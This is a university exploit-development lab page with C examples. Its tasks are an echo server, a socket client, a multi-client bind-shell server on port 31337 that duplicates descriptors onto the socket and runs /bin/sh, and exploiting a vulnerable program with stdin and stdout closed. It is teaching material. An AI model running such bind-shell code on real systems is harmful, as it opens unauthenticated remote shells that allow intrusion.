SI485H: Stack Based Binary Exploits (SP17)



Lab 09: Connect and Conquer

Submission Instructions

Submission instructions for labs can be found on the resource pages. In particular, you should view this subsection: Creating a new branch and submitting

Part 1: The echo server says, "what", "what" (2 points)

Description

  • Modify the remote shell program in assembly such that it now functions as an echo server. Whatever is read from the accepted socket is written back.

Preamble

  • This assignment can be completed on your VM

Instructions

  • Your task is to complete echo_server.asm such that it will execute an echo server on port 31337.
  • Your echo server must accept incoming connections, read strings of arbitrary length from the client socket, and write them back to the client unchanged.
  • Your assembly must be proper shell code in that it should not contain any NULL bytes and must be able to execute with the dummy_exploit program:

    ./dummy_exploit $(printf `./hexify.sh echo_server`)
    
  • The code you must translate into assembly should be similar to the following:

    while( (r = read(client_sock, buf, 10)) > 0){
      if ( write(client_sock, buf, r) != r ){
        exit(3);
      }
     }
    exit(3);
    
  • When completed properly, you should be able to execute your echo server in one terminal like above. In another terminal, you can connect to the server and get responses:

    user@si485H-base:~$ netcat localhost 31337
    short
    short
    looooooooooooooooong
    looooooooooooooooong
    very very very very very very very very very very very very very very loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong
    very very very very very very very very very very very very very very loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong
    ^D
    
  • When the client closes the connection with Ctrl-D (EOF), the echo server should exit with status 3:

    user@si485H-base:8.1$ ./dummy_exploit $(printf `./hexify.sh echo_server`)
    user@si485H-base:8.1$ echo $?
    3
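
The loop above, carried through in C as an added example (not the lab's own code, and not a substitute for the assembly you must submit): echo_loop() is the function to translate, and echo_selftest() drives it over a socketpair the way netcat would, with constructed messages shorter and longer than the 10-byte buffer, then closes its end to stand in for ^D and checks that the child exits with status 3. The read() return-value test is the whole point: only a positive count continues the loop, EOF (0) and errors (-1) both fall through to exit(3), and a write() that returns anything other than the count it was given is treated as failure.

```c
#define _POSIX_C_SOURCE 200809L
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* The lab's loop as a function of the client fd, so it can be exercised
 * over a socketpair.  Returns the status the echo server must exit with,
 * which is 3 whether the loop ended on EOF, a read error or a short write. */
int echo_loop(int client_sock)
{
    char buf[10];                 /* same 10-byte buffer as the lab's C */
    ssize_t r;

    /* read(): >0 bytes read, 0 on EOF (client hit ^D), -1 on error.
     * Only a positive result keeps looping, hence the "> 0" test. */
    while ((r = read(client_sock, buf, sizeof buf)) > 0) {
        /* write() returns the count it queued; anything other than r
         * (a short write or -1) is fatal. */
        if (write(client_sock, buf, (size_t)r) != r)
            return 3;
    }
    return 3;
}

/* Offline self-check: run echo_loop() in a child on one end of an AF_UNIX
 * socketpair, push constructed messages shorter and longer than the buffer
 * through it, then close our end (the ^D) and report the child's exit status. */
int echo_selftest(void)
{
    int sv[2], status;
    pid_t pid;
    /* constructed test input, not from the lab */
    const char *msgs[] = { "short\n", "very very very very loooooooooooooong\n" };

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {                       /* child: play the echo server */
        close(sv[0]);
        _exit(echo_loop(sv[1]));
    }
    close(sv[1]);

    for (size_t i = 0; i < sizeof msgs / sizeof msgs[0]; i++) {
        size_t len = strlen(msgs[i]), got = 0;
        char back[128];

        if (write(sv[0], msgs[i], len) != (ssize_t)len)
            return -1;
        /* the echo comes back in <= 10-byte chunks: collect until we have
         * everything we sent, which is how a client should read too */
        while (got < len) {
            ssize_t n = read(sv[0], back + got, len - got);
            if (n <= 0)
                return -1;
            got += (size_t)n;
        }
        if (memcmp(back, msgs[i], len) != 0)
            return -1;
    }

    close(sv[0]);                         /* EOF for the child, like ^D in netcat */
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    return echo_selftest() == 3 ? 0 : 1;
}
```

When you translate echo_loop() to assembly, the comparison is the part that usually goes wrong: the syscall returns the byte count (or a negative errno) in the accumulator, so test it signed and branch out of the loop on zero or negative, and reuse that count as the length argument of the write that follows.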
    

Submission

  • You must submit echo_server.asm

Hints

  • What are the return values of read() and write() and how can you condition on them?
  • You will need a loop

Part 2: The Bat Signal (3 points)

Description

  • Modify the remote shell program such that it will function as a client: connect to a service running on saddleback, read a message, and print that message in its entirety to stdout.

Preamble

  • This assignment can be completed on your VM

Instructions

  • Your task is to complete the batman.asm program such that it will function as a socket client.
  • Your program will connect to saddleback.academy.usna.edu on port 47733.
  • Once connected, you will read the message from the server and print it to the screen. The result should be the bat signal, like below. You will probably want to read in a loop.

    MMMMMMMMMMMMMMMMMMMMM.                             MMMMMMMMMMMMMMMMMMMMM
    `MMMMMMMMMMMMMMMMMMMM           M\  /M           MMMMMMMMMMMMMMMMMMMM'
      `MMMMMMMMMMMMMMMMMMM          MMMMMM          MMMMMMMMMMMMMMMMMMM'  
        MMMMMMMMMMMMMMMMMMM-_______MMMMMMMM_______-MMMMMMMMMMMMMMMMMMM    
         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
        .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.    
       MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
                      `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'                
                             `MMMMMMMMMMMMMMMMMM'                    
                                 `MMMMMMMMMM'                              
                                    MMMMMM                              
                                     MMMM                                  
                                      MM
    
  • After reading the bat signal, if your program writes "go robin", you'll get an additional message from the server that should be printed to screen. It's an ASCII art robin :)
  • When completed, the output should be as follows:

    MMMMMMMMMMMMMMMMMMMMM.                             MMMMMMMMMMMMMMMMMMMMM
     `MMMMMMMMMMMMMMMMMMMM           M\  /M           MMMMMMMMMMMMMMMMMMMM'
       `MMMMMMMMMMMMMMMMMMM          MMMMMM          MMMMMMMMMMMMMMMMMMM'  
         MMMMMMMMMMMMMMMMMMM-_______MMMMMMMM_______-MMMMMMMMMMMMMMMMMMM    
          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM    
         .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.    
        MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
                       `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'                
                              `MMMMMMMMMMMMMMMMMM'                    
                                  `MMMMMMMMMM'                              
                                     MMMMMM                              
                                      MMMM                                  
                                       MM      
    
                       ___
                     .'``.``.
                 ___/ (o) `, `.
                '-==`,     ;   `.
                     \    :      `-.
                     /    ';        `.
                    /      .'         `.
                    |     (      `.     `-.._              
                     \     \` ` `. \         `-.._    
                      `.   ;`-.._ `-`._.-. `-._   `-._ 
                        `..'     `-.```.  `-._ `-.._.' 
                         `--..__..-`--'      `-.,'  
                          `._)`/                   
                           /  /          
                          /--(           
                      -./,--'`-,         
                   ,^--(                 
                    ,--' `-,
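
The client side of this exchange in C, as an added example that is not the lab's code: connect_tcp() shows that connect() takes the same arguments as bind(), read_until_idle() is the "read in a loop" the instructions ask for, and bat_signal_exchange() runs the whole conversation, including the "go robin" follow-up. The caveat a read loop needs here is the stopping rule: a server that is waiting for "go robin" does not close the socket after the bat signal, so a loop that only stops at EOF would block forever; this one also stops when nothing has arrived for idle_ms. bat_selftest() checks the logic offline against a constructed fake server on a socketpair (a two-chunk stand-in for the signal, then a reply to the magic words); the real host and port, saddleback.academy.usna.edu and 47733, are the page's, everything else here is the example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <netdb.h>
#include <poll.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Resolve host:port and connect().  connect() takes the same (fd, sockaddr
 * pointer, length) triple as bind(); the address is the peer's, not ours.
 * Returns the connected fd or -1. */
int connect_tcp(const char *host, const char *port)
{
    struct addrinfo hints, *res;
    int fd;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0)
        return -1;
    fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd >= 0 && connect(fd, res->ai_addr, res->ai_addrlen) != 0) {
        close(fd);
        fd = -1;
    }
    freeaddrinfo(res);
    return fd;
}

/* Read a whole message: loop until the peer closes (read() == 0) or nothing
 * has arrived for idle_ms.  Stopping only at EOF would hang, because a
 * server waiting for "go robin" keeps the socket open.  Returns bytes read. */
ssize_t read_until_idle(int fd, char *out, size_t cap, int idle_ms)
{
    size_t got = 0;

    while (got < cap) {
        struct pollfd p = { .fd = fd, .events = POLLIN, .revents = 0 };
        int ready = poll(&p, 1, idle_ms);
        ssize_t n;

        if (ready < 0)
            return -1;
        if (ready == 0)                   /* idle: treat the message as complete */
            break;
        n = read(fd, out + got, cap - got);
        if (n < 0)
            return -1;
        if (n == 0)                       /* EOF */
            break;
        got += (size_t)n;
    }
    return (ssize_t)got;
}

/* The lab's exchange over a connected fd: collect the first message, send
 * the magic words, collect the reply.  Both land in out back to back. */
ssize_t bat_signal_exchange(int fd, char *out, size_t cap, int idle_ms)
{
    static const char magic[] = "go robin";   /* the string named in the lab */
    ssize_t a, b;

    if ((a = read_until_idle(fd, out, cap, idle_ms)) < 0)
        return -1;
    if (write(fd, magic, sizeof magic - 1) != (ssize_t)(sizeof magic - 1))
        return -1;
    if ((b = read_until_idle(fd, out + a, cap - (size_t)a, idle_ms)) < 0)
        return -1;
    return a + b;
}

/* Offline self-check against a constructed fake server (not saddleback): it
 * sends a two-chunk "signal", waits for "go robin", answers and closes.
 * Returns the total byte count if the transcript is the expected one. */
int bat_selftest(void)
{
    int sv[2];
    pid_t pid;
    char out[64];
    ssize_t total;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char cmd[16];
        close(sv[0]);
        write(sv[1], "MMMM\n", 5);
        write(sv[1], " MM \n", 5);
        if (read(sv[1], cmd, sizeof cmd) == 8 && memcmp(cmd, "go robin", 8) == 0)
            write(sv[1], "robin\n", 6);
        _exit(0);
    }
    close(sv[1]);
    total = bat_signal_exchange(sv[0], out, sizeof out - 1, 1000);
    close(sv[0]);
    waitpid(pid, NULL, 0);
    if (total < 0)
        return -1;
    out[total] = '\0';
    return strcmp(out, "MMMM\n MM \nrobin\n") == 0 ? (int)total : -1;
}
```

Against the real service you would call connect_tcp("saddleback.academy.usna.edu", "47733") and write whatever bat_signal_exchange() collects to fd 1. Your shellcode has no resolver, so it embeds the server's IPv4 address as a 4-byte literal in the sockaddr_in (look it up beforehand, with host or dig), and it reads with whatever stopping rule you choose; running the assembly under strace shows you exactly where each read returns and with how many bytes.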
    

Submission

  • You must submit one file: batman.asm

Hints

  • connect() looks a lot like bind() and accept(): the same socket, a sockaddr pointer and a length, only now the address is the server's rather than your own.
  • strace is a super useful debugging tool

Part 3: Don't fork bomb … 💥 Boom (2 Points)

Description

  • Modify the remote shell program such that it will function as a multi-process shell server. Multiple clients can connect and access shells. This will be done through the fork() system call: each new client connection forks a new process, which starts a remote shell.

Preamble

  • The assignment can be completed on your vm

Instructions

  • Your task is to complete the rsh_server.asm program such that it will execute a remote shell server on port 31337 that can handle multiple clients at the same time.
  • Your shell server must be able to accept incoming connections, and for each incoming connection it will fork a new process which will execute a remote shell.
  • The remote shell will have all standard file descriptors duplicated onto the client socket and will execute "/bin/sh" via the execve() system call.
  • Your assembly must be proper shell code in that it should not contain any NULL bytes and must be able to execute with the dummy_exploit program:

    ./dummy_exploit $(printf `./hexify.sh rsh_server`)
    
  • When completed properly, you should be able to execute your shell server in one terminal like above. In two terminals, simultaneously, you can connect to the server and get responses:

    user@si485H-base:~$ netcat localhost 31337
    ls  
    Makefile
    README.org
    README.org~
    dummy_exploit
    dummy_exploit.c
    hexify.sh
    rsh_server
    rsh_server.asm
    rsh_server.asm~
    rsh_server.o
    ^C
    user@si485H-base:~$ netcat localhost 31337
    cat /etc/passwd | grep root
    root:x:0:0:root:/root:/bin/bash
    ^C
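
The forking server in C, as an added example that is not the lab's code and not the assembly you must submit: listen_on() is the socket/bind/listen sequence, run_rsh_server() is the accept loop with the fork, and handle_client() is the per-client path that dup2()s fds 0, 1 and 2 onto the socket and execve()s /bin/sh. The accept loop is where fork bombs come from, so it is written to make the two parent-side obligations explicit: close the parent's copy of the client fd, and never let the parent run the child's code. rsh_selftest() exercises handle_client() offline by driving a real /bin/sh over a socketpair with a constructed command; the port, the shell path and the dup2-then-execve shape are the page's, the function names and the test command are the example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <netinet/in.h>
#include <signal.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Per-client work, meant to run in the forked child only: point fds 0, 1
 * and 2 at the client socket and replace the process with /bin/sh.
 * Returns only if something failed. */
int handle_client(int client)
{
    char *argv[] = { "/bin/sh", NULL };
    char *envp[] = { NULL };

    for (int fd = 0; fd < 3; fd++)
        if (dup2(client, fd) < 0)
            return -1;
    execve("/bin/sh", argv, envp);        /* the execve syscall, not libc execv() */
    return -1;
}

/* socket/bind/listen on 0.0.0.0:port; returns the listening fd or -1. */
int listen_on(uint16_t port)
{
    int srv = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in a;

    if (srv < 0)
        return -1;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_port = htons(port);             /* 31337 = 0x7a69: no NUL byte in either order */
    a.sin_addr.s_addr = INADDR_ANY;
    if (bind(srv, (struct sockaddr *)&a, sizeof a) != 0 || listen(srv, 8) != 0) {
        close(srv);
        return -1;
    }
    return srv;
}

/* Accept loop.  The fork-bomb hazards live in the parent path: it must
 * close its copy of the client fd (or the shell never sees EOF) and must
 * never fall into handle_client() itself (or it exec's a shell and stops
 * accepting).  Ignoring SIGCHLD lets the kernel reap finished shells. */
int run_rsh_server(uint16_t port)
{
    int srv = listen_on(port);

    if (srv < 0)
        return 1;
    signal(SIGCHLD, SIG_IGN);
    for (;;) {
        int client = accept(srv, NULL, NULL);
        pid_t pid;

        if (client < 0)
            continue;
        pid = fork();
        if (pid == 0) {                   /* child: never returns to the loop */
            close(srv);
            _exit(handle_client(client) < 0 ? 1 : 0);
        }
        close(client);                    /* parent (or failed fork): drop it, keep accepting */
    }
}

/* Offline self-check of the per-client path: drive a real /bin/sh through
 * a socketpair with a constructed command and return 1 if it answered. */
int rsh_selftest(void)
{
    int sv[2];
    pid_t pid;
    char buf[64];
    size_t got = 0;
    ssize_t n;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        close(sv[0]);
        _exit(handle_client(sv[1]) < 0 ? 1 : 0);
    }
    close(sv[1]);
    if (write(sv[0], "echo conquered\n", 15) != 15)
        return -1;
    shutdown(sv[0], SHUT_WR);             /* EOF to the shell, so it exits after the command */
    while ((n = read(sv[0], buf + got, sizeof buf - 1 - got)) > 0)
        got += (size_t)n;
    close(sv[0]);
    waitpid(pid, NULL, 0);
    buf[got] = '\0';
    return strcmp(buf, "conquered\n") == 0 ? 1 : 0;
}
```

In assembly the branch on fork()'s return value is the line to get right: zero means you are the child and should go on to dup2 and execve, anything else means you are the parent and should close the client fd and jump back to accept. Get it backwards, or forget the jump, and every connection (or every loop iteration) spawns another server, which is what the killall hint is about.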
    

Submission

  • You must submit at least one file: rsh_server.asm

Hints

  • Be quick on the killall trigger! Bugs have a way of multiplying, exponentially.

Part 4: You closed stdin and stdout?!?! (2 points)

Description

  • Some crazy programmer closed stdin and stdout, but the code is still vulnerable via the command line args. Use your wits to launch a shell, retrieve a secret message, and write your name to the log file.

Preamble

  • This assignment must be completed on the clone-1 VM

    ssh -p 2201 saddleback.academy.usna.edu
    

Instructions

  • On the clone-1 VM you'll find a vulnerable program at

    ~aviv/labs/9.4/vulnerable
    
  • The program has an obvious vulnerability, but some programmer decided to close stdin and stdout to make it more secure! Clearly this was a great idea.
  • Once you've successfully launched a shell, you'll find a secret message here:

    ~aviv/labs/9.4/secret.txt
    
  • Follow the instructions in the secret message to complete the lab.

Submissions

  • You must submit secret.txt with the instructions on what to do once you launch a shell
  • You must also follow those instructions

Hints

  • How could you possibly get a shell without stdin and stdout?